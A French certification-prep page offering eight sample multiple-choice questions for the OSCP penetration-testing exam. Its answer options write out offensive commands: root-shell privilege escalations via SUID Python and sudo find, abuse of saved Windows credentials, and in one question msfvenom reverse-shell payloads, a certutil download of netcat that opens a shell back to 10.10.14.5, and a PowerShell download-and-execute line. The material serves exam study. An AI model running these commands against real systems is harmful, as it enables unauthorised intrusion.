AccueilCertificationsOSCP › Questions gratuites

Questions gratuites OSCP — Offensive Security Certified Professional

Téléchargez gratuitement 60 questions d'entraînement pour la certification OSCP proposée par Offensive Security. Toutes les questions sont accompagnées de corrections détaillées avec explications techniques.

Caractéristiques de l'examen blanc

Code de certificationOSCP
ÉditeurOffensive Security
Nombre de questions60
TypeQCM avec 4 réponses possibles
Niveauprofessional
CatégorieSecurity
Prix100% gratuit

Aperçu de 8 questions représentatives

Voici un échantillon aléatoire de 8 questions tirées de notre base d'entraînement OSCP. Pour accéder aux 60 questions complètes, lancez l'examen blanc gratuitement.

Question 1
Durant un engagement de pentest, vous avez compromis un serveur Linux et obtenu un shell limité en tant qu'utilisateur 'www-data'. En examinant les fichiers avec find / -perm -4000 -type f 2>/dev/null, vous découvrez que le binaire /usr/bin/python3.8 possède le bit SUID avec le propriétaire root. Quelle commande vous permettra d'obtenir un shell root ?
  1. A. /usr/bin/python3.8 -c 'import subprocess; subprocess.call([\'sh\', \'-p\'])'
  2. B. /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system(\'/bin/bash\')'
  3. C. sudo /usr/bin/python3.8 -c 'import os; os.system(\'/bin/bash\')'
  4. D. /usr/bin/python3.8 -c 'import os; os.execvp(\'/bin/bash\', [\'bash\', \'-i\'])'
Question 2
Durant un pentest externe, vous découvrez qu'un serveur web de la cible retourne le header 'Server: Apache/2.4.49' dans ses réponses HTTP. Vous souhaitez vérifier si ce serveur est vulnérable à une faille spécifique connue. Quelle vulnérabilité critique est directement associée à cette version exacte d'Apache ?
  1. A. CVE-2021-41773 — Path Traversal et potentielle Remote Code Execution via le module mod_cgi
  2. B. CVE-2014-0160 — Heartbleed, fuite de mémoire dans la bibliothèque OpenSSL
  3. C. CVE-2017-5638 — Remote Code Execution dans Apache Struts via le Content-Type header
  4. D. CVE-2019-0211 — Privilege escalation locale dans Apache HTTP Server via scoreboard manipulation
Question 3
Au cours d'un pentest, vous compromettez un poste de travail Windows 10 et trouvez des identifiants stockés en clair dans un fichier de configuration. En exécutant 'cmdkey /list', vous observez une entrée 'Target: Domain:interactive=CORP\admin'. Quelle commande vous permet d'exploiter ces identifiants sauvegardés pour exécuter un processus en tant que l'utilisateur CORP\admin ?
  1. A. psexec.exe \\localhost -u CORP\admin cmd.exe
  2. B. runas /savecred /user:CORP\admin cmd.exe
  3. C. net use \\DC01\C$ /user:CORP\admin
  4. D. Start-Process cmd.exe -Credential (Get-Credential CORP\admin)
Question 4
Vous effectuez un pentest sur un réseau d'entreprise et obtenez un shell sur un serveur Windows en tant qu'utilisateur local à faibles privilèges. En exécutant 'cmdkey /list', vous découvrez une entrée 'Target: Domain:interactive=CORP\admin_backup / Type: Domain Password'. Quelle commande vous permettrait d'exploiter ces credentials stockés pour exécuter un processus avec les privilèges de ce compte ?
  1. A. net use \\DC01\C$ /user:CORP\admin_backup pour monter un partage réseau avec les credentials
  2. B. runas /savecred /user:CORP\admin_backup cmd.exe pour lancer un shell avec les credentials sauvegardés
  3. C. mimikatz.exe 'vault::cred' pour extraire le mot de passe en clair des credentials stockés
  4. D. psexec.exe -u CORP\admin_backup -accepteula cmd.exe pour lancer un shell distant avec ce compte
Question 5
Pendant la phase de reconnaissance d'un pentest interne, vous capturez du trafic réseau avec Wireshark et observez des requêtes LLMNR (port UDP 5355) et NBT-NS (port UDP 137) provenant de plusieurs postes de travail Windows. Quel est le risque de sécurité principal associé à ces protocoles et comment un attaquant peut-il l'exploiter dans un environnement Active Directory ?
  1. A. Ces protocoles transmettent les mots de passe en clair, permettant leur capture directe avec Wireshark
  2. B. Un attaquant peut empoisonner ces requêtes avec Responder pour se faire passer pour le serveur demandé, forçant les clients à envoyer leurs hashes d'authentification NTLMv2 qui peuvent ensuite être crackés offline ou relayés
  3. C. Ces protocoles permettent l'exécution de code à distance sur les postes clients via un buffer overflow dans le service de résolution de noms
  4. D. Un attaquant peut utiliser ces requêtes pour effectuer un DNS cache poisoning sur le contrôleur de domaine Active Directory
Question 6
Pendant un engagement de pentest interne, vous obtenez un accès en tant qu'utilisateur local sur un serveur Windows Server 2019. Vous découvrez que les clés de registre HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated et HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated sont toutes deux définies à 1. Quelle commande permet d'exploiter cette misconfiguration pour obtenir un reverse shell SYSTEM ?
  1. A. msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe > shell.exe && shell.exe
  2. B. msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f msi > exploit.msi && msiexec /quiet /qn /i exploit.msi
  3. C. certutil -urlcache -split -f http://10.10.14.5/nc.exe nc.exe && nc.exe -e cmd.exe 10.10.14.5 4444
  4. D. powershell -ep bypass -c 'IEX(New-Object Net.WebClient).DownloadString(http://10.10.14.5/Invoke-PowerShellTcp.ps1)'
Question 7
Lors d'un test d'intrusion, vous obtenez un shell en tant qu'utilisateur 'www-data' sur un serveur Ubuntu. En exécutant 'sudo -l', vous découvrez l'entrée suivante : '(ALL) NOPASSWD: /usr/bin/find'. Quelle commande vous permet d'obtenir un shell root de manière fiable ?
  1. A. sudo find / -name root -exec /bin/sh \;
  2. B. sudo find . -exec /bin/sh \; -quit
  3. C. sudo find / -perm -4000 -exec /bin/bash -p \;
  4. D. sudo find /etc/shadow -exec cat {} \;
Question 8
Vous effectuez un pentest sur un périmètre externe et identifiez un serveur avec les ports 22 (SSH), 80 (HTTP), 443 (HTTPS) et 8080 (HTTP-Proxy) ouverts. Le site web sur le port 80 est un site vitrine statique sans vulnérabilité apparente. En suivant une méthodologie OSCP rigoureuse, quelle approche d'énumération vous donnera le MEILLEUR rendement pour identifier des vecteurs d'attaque supplémentaires ?
  1. A. Concentrer tout l'effort sur le brute-force SSH avec une large wordlist de credentials par défaut
  2. B. Effectuer du directory/file busting sur CHAQUE service web (ports 80, 443, 8080) avec des wordlists adaptées, en testant également différentes extensions de fichiers (.php, .bak, .conf, .txt, .old)
  3. C. Lancer un scan de vulnérabilités automatisé avec Nessus sur l'ensemble des ports découverts
  4. D. Effectuer une analyse OSINT approfondie sur les employés de l'entreprise via LinkedIn pour préparer une attaque de phishing

Accédez aux 60 questions complètes gratuitement

Aucune carte bancaire requise. Examen chronométré, corrections détaillées, score final.

Lancer l'examen blanc OSCP →

Pourquoi s'entraîner avec Certifexpress ?